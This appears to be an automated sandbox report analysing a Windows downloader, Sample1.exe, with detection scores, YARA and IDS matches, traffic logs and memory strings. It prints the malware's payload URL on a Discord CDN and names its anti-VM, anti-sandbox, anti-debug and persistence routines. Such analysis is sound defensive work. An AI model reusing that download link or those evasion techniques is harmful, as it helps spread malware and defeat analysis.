Windows Analysis Report
Sample1.exe

Overview

General Information

Sample name: Sample1.exe
Analysis ID: 1591875
MD5: 45a47d815f2291bc7fc0112d36aaad83
SHA1: db1dc02b2d64c4c3db89b5df3124dd87d43059d5
SHA256: 416e63fb614101d5644592d5f589f358f8d5a41dd6812a717cbf05470864ac6f
Infos:

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Yara signature match

Classification

  • System is w11x64_office
  • Sample1.exe (PID: 8064 cmdline: "C:\Users\user\Desktop\Sample1.exe" MD5: 45A47D815F2291BC7FC0112D36AAAD83)
  • SystemSettingsBroker.exe (PID: 1800 cmdline: C:\Windows\System32\SystemSettingsBroker.exe -Embedding MD5: 899E65893CDEE7F9022DC9B583F94F0F)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Sample1.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
Sample1.exe | MALWARE_Win_DLInjector04 | Detects downloader / injector | ditekSHen |
    • 0xbc2:$s1: Runner
    • 0xc54:$s2: DownloadPayload
    • 0xc64:$s3: RunOnStartup
    • 0xbd6:$a1: Antis
    • 0xc03:$a2: antiVM
    • 0xc0a:$a3: antiSandbox
    • 0xc16:$a4: antiDebug
    • 0xc20:$a5: antiEmulator
    • 0xc2d:$a6: enablePersistence
    • 0xc3f:$a7: enableFakeError
    • 0xc7f:$a8: DetectVirtualMachine
    • 0xca4:$a9: DetectSandboxie
    • 0xccf:$a10: DetectDebugger
    • 0xcde:$a11: CheckEmulator

Source | Rule | Description | Author | Strings
Process Memory Space: Sample1.exe PID: 8064 | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
Process Memory Space: Sample1.exe PID: 8064 | JoeSecurity_GenericDownloader_4 | Yara detected Generic Downloader | Joe Security |

No Sigma rule has matched
        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2025-01-15T15:18:56.208229+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49725 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:19:01.854714+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49726 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:19:07.485230+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49728 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:19:13.110015+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49729 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:19:18.847202+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49733 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:19:24.464986+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49734 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:19:30.235710+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49735 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:19:35.857290+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49736 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:19:41.496340+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49738 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:19:47.151638+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49739 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:19:52.784463+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49740 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:19:58.602679+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49741 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:20:04.267335+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49742 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:20:09.899303+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49743 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:20:15.597093+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49744 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:20:21.219129+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49745 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:20:26.894034+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49746 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:20:32.497357+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49747 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:20:38.233099+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49748 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:20:43.861268+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49749 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:20:49.470785+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49750 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:20:55.238474+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49751 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:21:00.915491+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49755 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:21:06.530355+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49757 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:21:12.188694+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49760 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:21:17.839514+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49761 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:21:23.438596+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49762 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:21:29.086049+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49765 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:21:34.705037+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49766 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:21:40.342449+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49767 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:21:46.012112+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49768 | 162.159.134.233 | 443 | TCP
        2025-01-15T15:21:51.634893+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.25 | 49773 | 162.159.134.233 | 443 | TCP

        AV Detection

        Source: Sample1.exe | Avira: detected
        Source: Sample1.exe | Virustotal: Detection: 83%
        Source: Sample1.exe | ReversingLabs: Detection: 81%
        Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
        Source: Sample1.exe | Joe Sandbox ML: detected
        Source: Sample1.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknown | HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.25:49724 version: TLS 1.2
        Source: Sample1.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

        Networking

        Source: Yara match | File source: Process Memory Space: Sample1.exe PID: 8064, type: MEMORYSTR
        Source: Yara match | File source: Sample1.exe, type: SAMPLE
        Source: global traffic | HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 | Host: cdn.discordapp.com | Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 | Host: cdn.discordapp.com
        Source: Joe Sandbox View | IP Address: 162.159.134.233
        Source: Joe Sandbox View | JA3 fingerprint: 6a5d235ee78c6aede6a61448b4e9ff1e
        Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49741 -> 162.159.134.233:443
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic | DNS traffic detected: DNS query: cdn.discordapp.com
        Source: global traffic | DNS traffic detected: DNS query: assets.msn.com
        Source: global traffic | DNS traffic detected: DNS query: browser.events.data.msn.cn
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:18:50 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=X7ypTZTEe3FS6ntDcrLVkieFIGLyMnWqCWZbbyNseHE-1736950730-1.0.1.1-likCCWH0Q3yYZ6FO1WQd1bbYEd4g5Y1gK7QgTl5BNgWEF1Hf9EZgevojPYP8qoum1CfC6LCAACww6gAuPaOygg; path=/; expires=Wed, 15-Jan-25 14:48:50 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Es%2FdW%2FY14VFucDKBS72G8XCQ6MjEsgU%2B9gRwWVjvoVstzjj4zCAKiPTuok0W7XcanjENsHojotNuwDiYQyONyM6TAub21ZCkl92Bm4SmOwgjtCN9H31rKuE2hPrMpRd0Yvvm0Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=GLR.n09ePR8wKJpZKQOcpwthnOqAoRzDPG27pjOMP5M-1736950730258-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267f4fdd3d41e7-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:18:56 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=sPZ._gvZuiMsNC1n96Ew5M8C1UyphFYGF.7LtT3BzbQ-1736950736-1.0.1.1-9s7iaqaXP0mJn8UO0Tc5xnADY7mfwfn8HAIp31aF2QOpBezGeXHRvvU7wWZQjF652R075AM5d9iZjnolT1ftng; path=/; expires=Wed, 15-Jan-25 14:48:56 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z1kp3rZeL76F6b4n9wjFiAeE1XDTJXRDqI78XT20UV%2BOodmhJF%2Bg4cb%2FHqdLN5XIWgIflP44RMLOGIJBgNFkvlMQ5WQtj%2B8K0Y05bLtNhvYjUbGX2nCRLbS19XPf93VxHEiOdw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=SQe4d2dytBuhz3b7tvK8tGYIrzXfAv6vBzbIWTzU2HQ-1736950736123-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267f74ad5a41d3-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:19:01 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=vjKnbeyi0TI4kfIxj6mjPCAbJrqRMkAIJ_xSJEapyos-1736950741-1.0.1.1-bstkEOAXd52awHCodGlKdwmjNpF23s3tAvxhzveMTZaAkUvUCMtuY7czgcABYDiHqXqD1iJuOss56FVuvx771A; path=/; expires=Wed, 15-Jan-25 14:49:01 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lnca4oAFgsjacK0sn5i5m91LAv9Z8lOWc%2BWSiQEqg6BauUcsSSJm1JcCGiSrmx4AwGRYET7RRNc0JR0OjEgTK6EJYoZQr73rofRCcBrs713za0TcdE%2FtVMiJMrMc12kp4mHoTw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=5tm_VWzg3O0_T7.Qm_PSiBVUTsYz44y81LD73x1DT24-1736950741785-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267f981e56f799-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:19:07 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=tZGLutk0LFGV2qTE_YtsK1Ahp3kQ8T1ERueJsI.J1LQ-1736950747-1.0.1.1-Ke1mlI3InrdrQndQh6YXpmE9.x9gwgI.6XtAyJg760Iw81oTRbSo_lWJ6dQkeo3AcNeqz1ycVyQXc8bV_ka4Mw; path=/; expires=Wed, 15-Jan-25 14:49:07 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GPSob8UWbMprOoalMDEZ2Ahtm3r8FGl9aDBLs%2BYQX0c6ixZJXc%2BY3GhGSsCtQgh99Ze6MwGmDoOQUrK4SwzJwEh2Q0mCDTh%2FueGe6lF9pXU2g7zBgpodyTVaJjk8yNn4T5Ekcw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=Z9lzIZQM040oveucDtfeTrlMJfknbSPBUtCO5OdGjgI-1736950747441-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267fbb5977c33c-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:19:13 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=2m1rSsOEp2Ha_S74ELCRn3VC8gVJnZ0Fdgmfkf7FBc4-1736950753-1.0.1.1-xG9gBGNxNGZmgAohlUov77NM3.QnhZDttAtyFJCFgqdYcp9Zd5d_vhWK3pf9ACJm1U8t4tjNN6iFjkr7RVXbWQ; path=/; expires=Wed, 15-Jan-25 14:49:13 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=89dYNmdGL7ZmiCilgBnIugJb8SKyhsV7KNpMyWw2vWK9P%2BDo1%2BScBmFkrZntjl6Kd8DiM%2BKIvce3Su05gdnd8TdvrkjQPNlxRSJQ9QPC8S1DIjdrIYAvq8zhg11K6t1fifDGfA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=3Bchd1uF6715knDbZx82swkgk.h2L.O6b8.4V.w9gXI-1736950753065-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267fde88810f67-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:19:18 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=TM0WgwnCdWV5EI2EFCI7RetZqJKvnynsHlRAP46Yxd8-1736950758-1.0.1.1-YiqDepsOJEqYWpLHJew0UlftcWASkDedMFJQj_rdTUEhagmeERV3de2yqXbD_jDANOlbKIkjI.FBdriUzZG1Zg; path=/; expires=Wed, 15-Jan-25 14:49:18 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YcUQ%2FwjE%2BYeyg%2FCw%2BuU5sC%2BwUzA8edXlfboY3bEHhgoEPeOtGZeAb6Zta3CaZ6mab74IO4Gm2FPlY4QYWvqgoq0QAuzVuztBx3HZ9fCWMFmhmiLrWmE6lF%2BSTP0GBwcDTWN28g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=NBBwomD_aWliSeYZYpYtDDbx9eg5La688JlEqij29Xk-1736950758797-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902680025f6a0c9c-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:19:24 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=F7QkNRnc3xmRxVvV9zzcLxtoUTS2rdNMwvk_3Ps6FnU-1736950764-1.0.1.1-C6ZXZxPnOSGKo2g9mwNIGR_7dVlZFK5h7z8FXC2XrPShcBxjW8LXcEWiC58RyO6hwgN.w1HAIrPfFhNBpo9X8A; path=/; expires=Wed, 15-Jan-25 14:49:24 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PPBwSglxSzScbQdpFAjnOB9R9h9mBAAIuJBHJ2AjKkgyuPj6itW6s7%2BEdANTwDFeAwNhUaIHyEGi3rrLAdvDmVp8pgCBKmmwlqqoY5iRhzPUEZF9ftDyvLsGDorEl8E7sEh38A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=POu39wA5Ghdvj4D9Hl0YGjblB8aXaB8A2uv..LFn6aI-1736950764421-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902680257e4a424b-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:19:30 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=B7UkK4GtkILtya7G_fIfzqT9117kKEWh52Lq.xa6qgI-1736950770-1.0.1.1-a31nc6GY8NPoX3fGMV7DfN1vwszl1ShYRoP7pPdfnnFQijT71Qug1GP3QrVu1aiw8Y3vcYB1W4dMXQC5cyq_dA; path=/; expires=Wed, 15-Jan-25 14:49:30 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BaV7niJrZKvuk8F%2FxpMnvY8LETkJkQjfVXm8jtnsCiLDzr7Jk9ipr32pbouqxwmCeW0KoP0Wrp9qwxcM4Cc2%2Baay3ZjmUA3l6FcivZaEnZIIAfVvQ4XF5gqwQL1FhgoTSzOkww%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=U4CKkQsE4PsII0LkNqEhMgsh2RDIjkbCVdZoNaS0z4k-1736950770152-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902680496f511a44-EWRalt-svc: h3=":443"; ma=86400
        Source: Sample1.exe, 00000000.00000002.3195973420.0000000002E97000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3195973420.0000000002D29000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cdn.discordapp.com
        Source: Sample1.exe, 00000000.00000002.3198337251.000000001BD2A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: Sample1.exe, 00000000.00000002.3198337251.000000001BD2A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoftm
        Source: Sample1.exe, 00000000.00000002.3195973420.0000000002D02000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: Sample1.exe, 00000000.00000002.3195973420.0000000002D02000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3195973420.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3195973420.0000000002E97000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3195973420.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.discordapp.com
        Source: Sample1.exe | String found in binary or memory: https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe
        Source: unknown; HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.25:49724 version: TLS 1.2

        System Summary

        Source: Sample1.exe, type: SAMPLE; Matched rule: Detects downloader / injector; Author: ditekSHen
        Source: Sample1.exe, 00000000.00000002.3194048765.0000000000B54000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameclr.dllT vs Sample1.exe
        Source: Sample1.exe, 00000000.00000000.1322896045.0000000000752000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: OriginalFilenamepctool.exe4 vs Sample1.exe
        Source: Sample1.exe; Binary or memory string: OriginalFilenamepctool.exe4 vs Sample1.exe
        Source: Sample1.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: Sample1.exe, type: SAMPLE; Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
        Source: classification engine; Classification label: mal84.troj.evad.winEXE@2/0@3/1
        Source: C:\Users\user\Desktop\Sample1.exe; Mutant created: NULL
        Source: Sample1.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: Sample1.exe; Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Users\user\Desktop\Sample1.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: Sample1.exe; Virustotal: Detection: 83%
        Source: Sample1.exe; ReversingLabs: Detection: 81%
        Source: unknown; Process created: C:\Users\user\Desktop\Sample1.exe "C:\Users\user\Desktop\Sample1.exe"
        Source: unknown; Process created: C:\Windows\System32\SystemSettingsBroker.exe C:\Windows\System32\SystemSettingsBroker.exe -Embedding
        Source: C:\Windows\System32\SystemSettingsBroker.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B488CB7E-98BC-4FA9-9FCA-E461728EFDCE}\InProcServer32
        Source: Sample1.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: Sample1.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\Sample1.exe; Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\SystemSettingsBroker.exe; Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: Sample1.exe; Binary or memory string: SBIEDLL.DLL7
        Source: C:\Users\user\Desktop\Sample1.exe; Memory allocated: F20000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\Sample1.exe; Memory allocated: 1AC80000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\Sample1.exe; Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\Sample1.exe; Thread delayed: delay time: 600000
        Source: C:\Users\user\Desktop\Sample1.exe; Window / User API: threadDelayed 844
        Source: C:\Users\user\Desktop\Sample1.exe TID: 8068; Thread sleep count: 112 > 30
        Source: C:\Users\user\Desktop\Sample1.exe TID: 8068; Thread sleep count: 844 > 30
        Source: C:\Users\user\Desktop\Sample1.exe TID: 8068; Thread sleep time: -145000s >= -30000s
        Source: C:\Users\user\Desktop\Sample1.exe TID: 5576; Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\Desktop\Sample1.exe TID: 5576; Thread sleep time: -600000s >= -30000s
        Source: C:\Users\user\Desktop\Sample1.exe; Last function: Thread delayed
        Source: SystemSettingsBroker.exe, 00000027.00000003.3123186986.000001CE791A8000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
        Source: SystemSettingsBroker.exe, 00000027.00000003.3123186986.000001CE791A8000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: VMware Virtual disk SCSI Disk Deviceb
        Source: Sample1.exe; Binary or memory string: vmware
        Source: SystemSettingsBroker.exe, 00000027.00000003.3123186986.000001CE791A8000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: NECVMWar VMware SATA CD00|
        Source: SystemSettingsBroker.exe, 00000027.00000003.3129899216.000001CE79168000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
        Source: SystemSettingsBroker.exe, 00000027.00000003.3129899216.000001CE79168000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: 4NECVMWar VMware SATA CD00
        Source: SystemSettingsBroker.exe, 00000027.00000002.3196466727.000001CE79165000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: ..SWD\COMPUTER\MFG_VMware__Inc.&PROD_VMware20_1
        Source: SystemSettingsBroker.exe, 00000027.00000002.3195988847.000001CE79100000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
        Source: SystemSettingsBroker.exe, 00000027.00000002.3196466727.000001CE79165000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driverp
        Source: Sample1.exe, 00000000.00000002.3194048765.0000000000C09000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
        Source: SystemSettingsBroker.exe, 00000027.00000002.3195631104.000001CE76EF1000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: VMware, Inc. VMware20,1
        Source: Sample1.exe; Binary or memory string: DetectVirtualMachine
        Source: Sample1.exe; Binary or memory string: <Module>pctool.exeProgramStubRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorMainDownloadPayloadRunOnStartup.ctorExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatorurlregNameAppPathHidepathlpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributepctoolEnvironmentExitSystem.ThreadingThreadSleepSystem.IOPathGetTempPathCombineFileWriteAllBytesSystem.NetServicePointManagerSecurityProtocolTypeset_SecurityProtocolWebRequestCreateHttpWebRequestset_MethodWebResponseGetResponseHttpWebResponseStreamGetResponseStreamMemoryStreamCopyToCloseDisposeToArrayIDisposableAppDomainget_CurrentDomainget_FriendlyNameStringConcatExistsAssemblyGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineOpenSubKeySetValueCurrentUserException.cctorSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_Currentget_ItemToStringToLowerop_EqualityToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticks
        Source: SystemSettingsBroker.exe, 00000027.00000002.3196466727.000001CE79165000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
        Source: SystemSettingsBroker.exe, 00000027.00000002.3196285032.000001CE79144000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus DeviceNN
